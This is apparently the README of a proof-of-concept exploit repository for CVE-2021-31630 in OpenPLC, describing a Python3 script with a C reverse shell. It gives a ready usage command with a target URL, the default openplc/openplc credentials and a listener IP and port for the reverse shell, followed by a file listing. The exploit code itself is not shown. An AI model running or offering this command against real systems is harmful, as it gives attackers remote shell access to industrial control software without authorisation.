POC Exploit for CVE-2021-31630 written in Python3 and using C reverse shell with non-blocking mode# How to use
```
python3 exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
```
[4.0K] /data/pocs/1b5b0c79fd01aa785694c522d3dc933fe66d6dcb
├── [3.2K] exploit.py
└── [ 151] README.md
0 directories, 2 files